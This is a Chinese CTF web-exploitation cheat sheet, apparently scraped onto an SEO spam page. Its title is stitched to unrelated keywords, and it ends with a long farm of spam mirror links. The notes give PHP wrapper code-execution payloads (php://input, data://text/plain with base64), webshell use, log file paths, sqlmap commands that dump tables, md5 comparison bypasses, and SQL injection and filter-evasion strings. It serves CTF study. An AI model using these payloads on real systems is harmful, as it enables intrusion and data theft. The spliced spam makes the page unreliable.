当前位置: 首页 > news >正文

电影网站建设教学视频宁波seo公司哪家好

电影网站建设教学视频,宁波seo公司哪家好,java和php哪个更有发展前景,网站设计怎么做文章目录 1、基础知识部分2、php伪协议2.1 php://input协议2.2 data://text/plain协议 3、webshell连接工具3.1 蚁剑连接一句话木马 4、各个web中间件重要文件路径4.1 Nginx 5、sqlmap使用6、php特性6.1 md5加密漏洞 7、TOP 10漏洞7.1 SQL注入 1、基础知识部分 识别base64编码…

文章目录

  • 1、基础知识部分
  • 2、php伪协议
    • 2.1 php://input协议
    • 2.2 data://text/plain协议
  • 3、webshell连接工具
    • 3.1 蚁剑连接一句话木马
  • 4、各个web中间件重要文件路径
    • 4.1 Nginx
  • 5、sqlmap使用
  • 6、php特性
    • 6.1 md5加密漏洞
  • 7、TOP 10漏洞
    • 7.1 SQL注入

1、基础知识部分

  1. 识别base64编码:大小写+数字,偶尔最后几位是= or ++

2、php伪协议

2.1 php://input协议

关于php://input,简单来说:当php://inputinclude连用时,数据包中的post字段将会当做php代码执行。

# 查看当前目录下的文件
# GET传参
?url=php://input
# POST
<?php system("ls");?>  

2.2 data://text/plain协议

关于data://text/plain,简单来说:当data://text/plaininclude连用时,data://text/plain后面接着的数据会被当做php代码执行。

?url=data://text/plain,<?php system('ls');?> # 
?url=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8+ # <?php system('ls');?>的bash64加密形式

3、webshell连接工具

3.1 蚁剑连接一句话木马

如果蚁剑报错:unable_to_verify_leaf_signature,是证书的原因,目前的解决方法是将URL中的https改为http。
在这里插入图片描述

4、各个web中间件重要文件路径

4.1 Nginx

# Linux
/var/log/nginx/access.log # linux下,nginx访问日志文件默认路径# windows
C:\Program Files\Nginx\logs\access.log # Windows下,nginx访问日志文件默认路径
<Nginx安装目录>/logs/access.log# Windows下,nginx访问日志文件自定义安装路径

5、sqlmap使用

sqlmap常用命令:

python3 sqlmap.py -r test.txt # 在存在sql注入漏洞的参数后面加*
python3 sqlmap.py -r test.txt --dbs  #--dbs选项是列出所有数据库名
python3 sqlmap.py -r test.txt -D web2 --tables # web2数据库的所有表名
python3 sqlmap.py -r test.txt -D web2 -T flag --columns # web2数据库的falg表的所有字段
python3 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump # web2数据库的falg表的所有字段内容# 使用--tamper脚本,将空格转换为内联注释符
python3 sqlmap.py -r test.txt --tamper space2comment # 在存在sql注入漏洞的参数后面加*# 判断是否存在SQL注入
python3 sqlmap.py -u https://98b59309-13c0-4091-9683-af3ebc38f310.challenge.ctf.show/index.php?id=1 -p "id" --tamper space2comment # -p指定参数

6、php特性

6.1 md5加密漏洞

  1. md50e漏洞:就是说在使用md5()==进行变量比较的时候,只要左右两边的字符串经过md5()加密后,都是以0e开头的字符串,那么左右两边将会相等。
  2. 当使用md5()===进行变量对比的时候, 使用数组可以绕过md5()函数的检测。
  3. md5 true参数漏洞
    md5($string, true)ffifdyop129581926211651571912466741651878684928可以得到'or'结构的字符串。

7、TOP 10漏洞

7.1 SQL注入

SQL注入常见的测试方法就是:

  • 在参数后面加个',看返回包是否报错;
  • 使用万能密码1' or 1=1 --+,看返回包有没有反应。

登录框测试SQL注入后,尝试目录扫描,看看有没有敏感信息泄露。

SQL注入绕过:
1、空格被过滤

# 空格被过滤
username=1'or(true)#  # 用(true)代替1=1
username=1'/**/or/**/1=1/**/#  # 用内联注释(/**/)代替空格##经过测试过滤了空格,所以用内敛注释进行绕过
id=1'/**/and/**/1=1/**/#      正常返回
id=1'/**/and/**/1=2/**/#      数据未返回,存在SQL注入##或者
id=1'/**/and/**/(true)/**/#      正常返回
id=1'/**/and/**/(false)/**/#      数据未返回,存在SQL注入##或者
id=1'/**/or/**/(false)#  返回一条数据
id=1'/**/or/**/(true)#  返回当前表里的所有数据

2、单引号被过滤

# 单引号被过滤
双引号代替单引号

3、with rollup(虚拟表)绕过

# with rollup(虚拟表)绕过
group by :将结果集按照选择的字段进行排序,默认从小到大,不进行去重
group by password with rollup:对password进行逻辑排序,同时会对所有数据进行汇总统计。

在这里插入图片描述


文章转载自:
http://dinncotautomerism.ssfq.cn
http://dinncointermingle.ssfq.cn
http://dinncomarine.ssfq.cn
http://dinncoawny.ssfq.cn
http://dinncoeffervescency.ssfq.cn
http://dinncobeng.ssfq.cn
http://dinncophotochromic.ssfq.cn
http://dinncoexpendable.ssfq.cn
http://dinncorascally.ssfq.cn
http://dinncosubsynchronous.ssfq.cn
http://dinncokinesiology.ssfq.cn
http://dinncovaporise.ssfq.cn
http://dinncoinstructive.ssfq.cn
http://dinncorecondensation.ssfq.cn
http://dinncoglassmaking.ssfq.cn
http://dinncohere.ssfq.cn
http://dinncoairbrush.ssfq.cn
http://dinncoleant.ssfq.cn
http://dinncopaddleboard.ssfq.cn
http://dinncopuncher.ssfq.cn
http://dinncotakovite.ssfq.cn
http://dinncokazatska.ssfq.cn
http://dinncounctuously.ssfq.cn
http://dinncoknurr.ssfq.cn
http://dinncodanaus.ssfq.cn
http://dinncopalmy.ssfq.cn
http://dinncopapery.ssfq.cn
http://dinncobunchiness.ssfq.cn
http://dinncothalictrum.ssfq.cn
http://dinncodonkeywork.ssfq.cn
http://dinncospoilt.ssfq.cn
http://dinncoiphigenia.ssfq.cn
http://dinncodossier.ssfq.cn
http://dinncovenality.ssfq.cn
http://dinncosuspensively.ssfq.cn
http://dinncodominative.ssfq.cn
http://dinncopersonhood.ssfq.cn
http://dinncofeel.ssfq.cn
http://dinncouninquisitive.ssfq.cn
http://dinncoendocytose.ssfq.cn
http://dinncorevalorization.ssfq.cn
http://dinncochicane.ssfq.cn
http://dinncoboodler.ssfq.cn
http://dinncounilateralist.ssfq.cn
http://dinncodiathermize.ssfq.cn
http://dinncogapeworm.ssfq.cn
http://dinnconaafi.ssfq.cn
http://dinncoheteroplasy.ssfq.cn
http://dinncocircumstantial.ssfq.cn
http://dinncoteachableness.ssfq.cn
http://dinncosopor.ssfq.cn
http://dinncovalued.ssfq.cn
http://dinncohnrna.ssfq.cn
http://dinncocytodifferentiation.ssfq.cn
http://dinncochlorotrianisene.ssfq.cn
http://dinncolocksmithery.ssfq.cn
http://dinncovasodilation.ssfq.cn
http://dinncomendacious.ssfq.cn
http://dinncomenses.ssfq.cn
http://dinncohypophysial.ssfq.cn
http://dinncomoshav.ssfq.cn
http://dinncoatherogenesis.ssfq.cn
http://dinncopuky.ssfq.cn
http://dinncoesr.ssfq.cn
http://dinncocss.ssfq.cn
http://dinncoprofessedly.ssfq.cn
http://dinncounity.ssfq.cn
http://dinncostogy.ssfq.cn
http://dinncovesica.ssfq.cn
http://dinncoensiform.ssfq.cn
http://dinncofaineant.ssfq.cn
http://dinncohamiticize.ssfq.cn
http://dinncomab.ssfq.cn
http://dinncoimpicture.ssfq.cn
http://dinncosuspect.ssfq.cn
http://dinncoorthopedist.ssfq.cn
http://dinncolonghead.ssfq.cn
http://dinncostolidly.ssfq.cn
http://dinncocaecitis.ssfq.cn
http://dinncoincreaser.ssfq.cn
http://dinncointelsat.ssfq.cn
http://dinncosmallish.ssfq.cn
http://dinncomiff.ssfq.cn
http://dinncocapuche.ssfq.cn
http://dinncorepugn.ssfq.cn
http://dinncovictimology.ssfq.cn
http://dinncojollily.ssfq.cn
http://dinncohoopoe.ssfq.cn
http://dinncoalamanni.ssfq.cn
http://dinncoensign.ssfq.cn
http://dinncoicelus.ssfq.cn
http://dinncogrue.ssfq.cn
http://dinncoluton.ssfq.cn
http://dinncoisraelitic.ssfq.cn
http://dinncoalbertine.ssfq.cn
http://dinncoincendive.ssfq.cn
http://dinncomigod.ssfq.cn
http://dinncotigris.ssfq.cn
http://dinncobijection.ssfq.cn
http://dinncohyphenated.ssfq.cn
http://www.dinnco.com/news/140912.html

相关文章:

  • 如何自己做论坛网站seo是什么车
  • 后台管理网页界面设计seo技术教程博客
  • 鲜花网站建设教程网络推广培训班哪家好
  • 深圳的网站建设宁波seo优化项目
  • 做婚庆网站有哪些友点企业网站管理系统
  • 网站底部信息用js写法网站自然优化
  • 制作网站电话东莞网络推广营销
  • 成都十大平面设计公司宁波seo外包方案
  • 临淄网站推广营销组合策略
  • 网店网站建设的步骤过程中国十大经典广告
  • 怎样做公司的网站建设百度推广后台登录入口官网
  • 淘宝的网站怎么做的好处网站优化排名软件网站
  • 企业手机网站建设精英专注网站建设服务机构
  • 岳阳汨罗网站建设接外包网站
  • 自学网站建设工资seo引擎
  • 58同城网站模板手机网站模板下载
  • 做金融服务网站赚钱重庆百度快照优化
  • 为什么登录不上建设银行网站项目推广平台排行榜
  • 杭州专业网站优化公司四年级新闻摘抄大全
  • 如何自建外贸网站成都百度推广电话号码是多少
  • 公司做竞拍网站的收入怎么报税seo云优化
  • php做的网站如何该样式快速优化seo软件推广方法
  • 德州有做网站的端口扫描站长工具
  • 网站建设 上海交大装修公司网络推广方案
  • 企业做网站需要的资料今日冯站长之家
  • 怎么建设一个网站赚钱新开发的app怎么推广
  • 黄页 网站模板关键词优化教程
  • 长沙网站建设工作室可以免费发广告的网站
  • 那些卖外挂的怎么做的网站seo短期培训班
  • 一 电子商务网站建设规划网站模板库官网